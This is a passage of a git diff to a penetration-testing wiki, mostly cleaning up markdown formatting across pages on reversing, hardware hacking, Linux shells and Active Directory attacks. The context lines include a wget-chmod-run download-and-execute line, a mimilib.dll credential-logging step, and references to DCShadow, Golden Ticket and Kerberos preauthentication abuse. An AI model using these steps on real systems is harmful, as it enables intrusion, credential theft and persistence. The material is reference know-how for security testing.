workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review. diff --git a/radio-hacking/pentesting-rfid.md b/radio-hacking/pentesting-rfid.md index a984f7fd..a471e917 100644 --- a/radio-hacking/pentesting-rfid.md +++ b/radio-hacking/pentesting-rfid.md @@ -35,7 +35,7 @@ Many people refer to this technology as **Near Field Communication (NFC)**, a te ## Attacking RFID Systems with Proxmark3 -The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)****[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). +The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). ### Attacking MIFARE Classic 1KB diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md index 521e22d6..b1703b8d 100644 --- a/reversing/cryptographic-algorithms/README.md +++ b/reversing/cryptographic-algorithms/README.md @@ -20,7 +20,7 @@ Compresses and decompresses a given buffer of data. #### CryptAcquireContext - The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. +The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. #### CryptCreateHash @@ -67,7 +67,7 @@ It's composed of 3 main parts: **In order to identify a RC4 in a disassembly/decompiled code you can check for 2 loops of size 0x100 (with the use of a key) and then a XOR of the input data with the 256 values created before in the 2 loops probably using a %256 (mod 256)** {% endhint %} -### **Initialization stage/Substitution Box:** ****(Note the number 256 used as counter and how a 0 is written in each place of the 256 chars) +### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars) ![](<../../.gitbook/assets/image (377).png>) @@ -96,7 +96,7 @@ It's composed of 3 main parts: ### Characteristics * It's rare to find some malware using it but there are examples (Ursnif) -* Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function) +* Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function) ### Identifying diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md index 7bf40d62..cf40c249 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/reversing/reversing-tools-basic-methods/README.md @@ -129,7 +129,7 @@ Then, looking to this ca see when the execution was stopped in the dll you want ## GUI Apps / Videogames -****[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: +[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: {% content-ref url="cheat-engine.md" %} [cheat-engine.md](cheat-engine.md) @@ -155,7 +155,7 @@ You can find a slightly modified version of Blobrunner in the following link. In ### Debugging a shellcode with jmp2it -****[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. +[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. ![](<../../.gitbook/assets/image (397).png>) @@ -163,7 +163,7 @@ You can download a compiled version of [jmp2it inside the releases page](https:/ ### Debugging shellcode using Cutter -****[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. +[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't: @@ -219,7 +219,7 @@ apt-get install libz3-dev And [install keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) (`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`) -If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) +If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) ## Rust @@ -234,7 +234,7 @@ Having the **name** of the **functions** being called, search for them on the ** For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) -I you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)**** +I you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi) Just press **ATL+f7** (import python plugin in IDA) and select the python plugin. @@ -262,9 +262,9 @@ In this page you can find how to get the python code from an ELF/EXE python comp If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it: -* ****[**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface -* ****[**mgba** ](https://mgba.io)- Contains a CLI debugger -* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin +* [**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface +* [**mgba** ](https://mgba.io)- Contains a CLI debugger +* [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin * [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra plugin In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** ** you can see how to press the Game Boy Advance **buttons** @@ -315,7 +315,7 @@ void FUN_080015a8(void) uVar4 = DAT_030004d8; ``` - It's found this code: +It's found this code: ```c do { @@ -369,7 +369,7 @@ In the previous code you can see that we are comparing **uVar1** (the place wher So, in this challenge, knowing the values of the buttons, you needed to **press a combination with a length smaller than 8 that the resulting addition is 0xf3.** -**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)**** +**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/) ## Game Boy diff --git a/reversing/reversing-tools-basic-methods/cheat-engine.md b/reversing/reversing-tools-basic-methods/cheat-engine.md index 7d1dbd0a..ec22ed48 100644 --- a/reversing/reversing-tools-basic-methods/cheat-engine.md +++ b/reversing/reversing-tools-basic-methods/cheat-engine.md @@ -1,6 +1,6 @@ # Cheat Engine -****[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them.\ +[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them.\ When you download and run it, you are **presented** with a **tutorial** of how to use the tool. If you want to learn how to use the tool it's highly recommended to complete it. ## What are you searching? @@ -79,7 +79,7 @@ Note that there are a **lot of possible changes** and you can do these **steps a ### Random Memory Address - Finding the code -Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address. +Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address. Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a **right click** on the found **address** and select "**Find out what accesses this address**" or "**Find out what writes to this address**": diff --git a/reversing/reversing-tools/README.md b/reversing/reversing-tools/README.md index fa604ff8..b83dad5a 100644 --- a/reversing/reversing-tools/README.md +++ b/reversing/reversing-tools/README.md @@ -145,7 +145,7 @@ You can find a slightly modified version of Blobrunner in the following link. In ### Debugging a shellcode with jmp2it -\*\*\*\*[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. +[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. ![](../../.gitbook/assets/image%20%28403%29.png) @@ -153,7 +153,7 @@ You can download a compiled version of [jmp2it inside the releases page](https:/ ### Debugging shellcode using Cutter -\*\*\*\*[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. +[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't: @@ -171,7 +171,7 @@ You can see the stack for example inside a hex dump: ### Deobfuscating shellcode and getting executed functions -You should try ****[**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152). +You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152). It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. ```bash diff --git a/shells/shells/linux.md b/shells/shells/linux.md index 1e1e89db..0993eb08 100644 --- a/shells/shells/linux.md +++ b/shells/shells/linux.md @@ -1,6 +1,6 @@ # Shells - Linux -**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)**** +**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com) ## Full TTY @@ -43,7 +43,7 @@ wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.s ## Forward Shell You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\ -You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)**** +You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell) You just need to modify: diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md index 8498b9e7..767847d5 100644 --- a/stealing-sensitive-information-disclosure-from-a-web.md +++ b/stealing-sensitive-information-disclosure-from-a-web.md @@ -4,6 +4,6 @@ If at some point you find a **web page that presents you sensitive information b Here I present you the main ways to can try to achieve it: * [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. -* ****[**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. -* ****[**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. +* [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. +* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. * [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). diff --git a/todo/hardware-hacking/README.md b/todo/hardware-hacking/README.md index 033fc368..5b964a09 100644 --- a/todo/hardware-hacking/README.md +++ b/todo/hardware-hacking/README.md @@ -29,7 +29,7 @@ Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a gene * Test data output (**TDO**) TDO is the pin that sends **data out of the chip**. * Test reset (**TRST**) input The optional TRST resets the finite state machine **to a known good state**. Alternatively, if the TMS is held at 1 for five consecutive clock cycles, it invokes a reset, the same way the TRST pin would, which is why TRST is optional. -Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**. +Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**. ### Identifying JTAG pins @@ -37,7 +37,7 @@ The fastest but most expensive way to detect JTAG ports is by using the **JTAGul It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal -A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) **** loaded on an Arduino-compatible microcontroller. +A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller. Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device. diff --git a/todo/hardware-hacking/jtag.md b/todo/hardware-hacking/jtag.md index 37e89d65..ff3f8cf5 100644 --- a/todo/hardware-hacking/jtag.md +++ b/todo/hardware-hacking/jtag.md @@ -2,7 +2,7 @@ ## JTAGenum -****[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)is a tool can be used with a Raspberry PI or an Arduino to find to try JTAG pins from an unknown chip.\ +[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)is a tool can be used with a Raspberry PI or an Arduino to find to try JTAG pins from an unknown chip.\ In the **Arduino**, connect the **pins from 2 to 11 to 10pins potentially belonging to a JTAG**. Load the program in the Arduino and it will try to bruteforce all the pins to find if any pins belongs to JTAG and which one is each.\ In the **Raspberry PI** you can only use **pins from 1 to 6** (6pins, so you will go slower testing each potential JTAG pin). diff --git a/todo/hardware-hacking/radio.md b/todo/hardware-hacking/radio.md index fb56137c..d81c60f6 100644 --- a/todo/hardware-hacking/radio.md +++ b/todo/hardware-hacking/radio.md @@ -2,7 +2,7 @@ ## SigDigger -****[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time). +[**SigDigger** ](https://github.com/BatchDrake/SigDigger)is a free digital signal analyzer for GNU/Linux and macOS, designed to extract information of unknown radio signals. It supports a variety of SDR devices through SoapySDR, and allows adjustable demodulation of FSK, PSK and ASK signals, decode analog video, analyze bursty signals and listen to analog voice channels (all in real time). ### Basic Config @@ -157,7 +157,7 @@ In the previous image you can observe pretty good that **2 frequencies are used* This is because I capture the signal in booth frequencies, therefore one is approximately the other in negative: - + ![](<../../.gitbook/assets/image (656).png>) diff --git a/todo/hardware-hacking/spi.md b/todo/hardware-hacking/spi.md index 4b5d0360..89cd621f 100644 --- a/todo/hardware-hacking/spi.md +++ b/todo/hardware-hacking/spi.md @@ -12,7 +12,7 @@ Note that even if the PINOUT of the Pirate Bus indicates pins for **MOSI** and * ![](<../../.gitbook/assets/image (648).png>) -In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) **** to dump the content of the flash memory running something like: +In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) to dump the content of the flash memory running something like: ```bash # In this command we are indicating: diff --git a/todo/misc.md b/todo/misc.md index cc0605a1..c754d66c 100644 --- a/todo/misc.md +++ b/todo/misc.md @@ -13,7 +13,7 @@ $6$- sha512 If you do not know what is behind a service, try to make and HTTP GET request. **UDP Scans**\ -****nc -nv -u -z -w 1 \ 160-16 +nc -nv -u -z -w 1 \ 160-16 An empty UDP packet is sent to a specific port. If the UDP port is open, no reply is sent back from the target machine. If the UDP port is closed, an ICMP port unreachable packet should be sent back from the target machine.\ diff --git a/todo/more-tools.md b/todo/more-tools.md index 89ce9363..a120619d 100644 --- a/todo/more-tools.md +++ b/todo/more-tools.md @@ -61,7 +61,7 @@ * [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Lateral movements * [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins * [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) ([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)): Persistence -* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows Process Injection techniques +* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows Process Injection techniques * [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : Red Team scripts * [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : find security-related misconfigurations in Active Directory Group Policy. * [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Securestring obfuscation diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md index 55284f7a..c895ef71 100644 --- a/windows/active-directory-methodology/README.md +++ b/windows/active-directory-methodology/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -254,7 +254,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ Note that if you use wrong data, pretty ugly logs will appear.\ -[**More information about DCShadow here.**](dcshadow.md)\*\*\*\* +[**More information about DCShadow here.**](dcshadow.md) ## Forest Privilege Escalation - Domain Trusts diff --git a/windows/active-directory-methodology/acl-persistence-abuse.md b/windows/active-directory-methodology/acl-persistence-abuse.md index f5439b39..73faf19a 100644 --- a/windows/active-directory-methodology/acl-persistence-abuse.md +++ b/windows/active-directory-methodology/acl-persistence-abuse.md @@ -6,7 +6,7 @@ This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs. -Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). +Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). An example of ACEs for the "Domain Admins" securable object can be seen here: @@ -261,7 +261,7 @@ Set-Acl -Path $path -AclObject $acl ## **Replication on the domain (DCSync)** The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\ -[**Learn more about the DCSync attack here.**](dcsync.md)**** +[**Learn more about the DCSync attack here.**](dcsync.md) ## GPO Delegation @@ -279,7 +279,7 @@ The below indicates that the user `offense\spotless` has **WriteProperty**, **Wr ![](../../.gitbook/assets/a14.png) -****[**More about general AD ACL/ACE abuse here.**](acl-persistence-abuse.md)**** +[**More about general AD ACL/ACE abuse here.**](acl-persistence-abuse.md) ### Abusing the GPO Permissions diff --git a/windows/active-directory-methodology/ad-information-in-printers.md b/windows/active-directory-methodology/ad-information-in-printers.md index 899b9c65..567b1b80 100644 --- a/windows/active-directory-methodology/ad-information-in-printers.md +++ b/windows/active-directory-methodology/ad-information-in-printers.md @@ -12,7 +12,7 @@ Some blogs about the topic: * [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/) * [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) -**The following information was copied from** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)**** +**The following information was copied from** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/) ## LDAP settings diff --git a/windows/active-directory-methodology/asreproast.md b/windows/active-directory-methodology/asreproast.md index ac579c26..64f6d39f 100644 --- a/windows/active-directory-methodology/asreproast.md +++ b/windows/active-directory-methodology/asreproast.md @@ -47,4 +47,4 @@ Force **preauth** not required for a user where you have **GenericAll** permissi Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose ``` -****[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)**** +[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) diff --git a/windows/active-directory-methodology/bloodhound.md b/windows/active-directory-methodology/bloodhound.md index d1edc582..5aecdc52 100644 --- a/windows/active-directory-methodology/bloodhound.md +++ b/windows/active-directory-methodology/bloodhound.md @@ -95,7 +95,7 @@ If you wish to execute SharpHound using different credentials you can create a C runas /netonly /user:domain\user "powershell.exe -exec bypass" ``` -****[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)**** +[**Learn more about Bloodhound in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux) ### **Python** diff --git a/windows/active-directory-methodology/constrained-delegation.md b/windows/active-directory-methodology/constrained-delegation.md index 29995510..656d0b34 100644 --- a/windows/active-directory-methodology/constrained-delegation.md +++ b/windows/active-directory-methodology/constrained-delegation.md @@ -52,4 +52,4 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp. * Limit DA/Admin logins to specific services * Set "Account is sensitive and cannot be delegated" for privileged accounts. -****[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)**** +[**More information in ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation) diff --git a/windows/active-directory-methodology/custom-ssp.md b/windows/active-directory-methodology/custom-ssp.md index c688ed5b..3a4e5924 100644 --- a/windows/active-directory-methodology/custom-ssp.md +++ b/windows/active-directory-methodology/custom-ssp.md @@ -8,7 +8,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential #### Mimilib You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\ -****Drop the dll in `C:\Windows\System32\`\ +Drop the dll in `C:\Windows\System32\`\ Get a list existing LSA Security Packages: {% code title="attacker@target" %} diff --git a/windows/active-directory-methodology/dcshadow.md b/windows/active-directory-methodology/dcshadow.md index 463f1cab..d3901362 100644 --- a/windows/active-directory-methodology/dcshadow.md +++ b/windows/active-directory-methodology/dcshadow.md @@ -30,7 +30,7 @@ You can push the changes from a DA or from a user with this minimal permissions: * _DS-Install-Replica_ (Add/Remove Replica in Domain) * _DS-Replication-Manage-Topology_ (Manage Replication Topology) * _DS-Replication-Synchronize_ (Replication Synchornization) -* The **Sites object** (and its children) in the **Configuration container**: +* The **Sites object** (and its children) in the **Configuration container**: * _CreateChild and DeleteChild_ * The object of the **computer which is registered as a DC**: * _WriteProperty_ (Not Write) @@ -81,4 +81,4 @@ Notice that in this case you need to make **several changes,** not just one. So, -****[**More information about DCShadow in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)**** +[**More information about DCShadow in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow) diff --git a/windows/active-directory-methodology/golden-ticket.md b/windows/active-directory-methodology/golden-ticket.md index ee253f59..98d576d6 100644 --- a/windows/active-directory-methodology/golden-ticket.md +++ b/windows/active-directory-methodology/golden-ticket.md @@ -32,4 +32,4 @@ Golden ticket events ID: * 4672: Admin Logon * `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property` -****[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)**** +[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets) diff --git a/windows/active-directory-methodology/kerberos-authentication.md b/windows/active-directory-methodology/kerberos-authentication.md index 2c9724b5..58c8edfa 100644 --- a/windows/active-directory-methodology/kerberos-authentication.md +++ b/windows/active-directory-methodology/kerberos-authentication.md @@ -1,6 +1,6 @@ # Kerberos Authentication -**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)**** +**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/) ## Kerberos (I): How does Kerberos work? – Theory diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md index a568504a..0b5d68d7 100644 --- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md +++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md @@ -28,7 +28,7 @@ Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityRefer If you don't want to wait an hour you can use a PS script to make the restore happen instantly: [https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1) -****[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)**** +[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) ## Account Operators @@ -112,7 +112,7 @@ sc.exe \\dc01 stop dns sc.exe \\dc01 start dns ``` -****[**Learn more about this privilege escalation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise) +[**Learn more about this privilege escalation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise) ## **AD Recycle Bin** @@ -126,16 +126,16 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * ## Group Managed Service Accounts (gMSA) - In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:** +In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:** -* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date. +* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date. * It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA. * It cannot be lock out or use for interactive login * Supports to share across multiple hosts * Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks) * Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change. - gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the 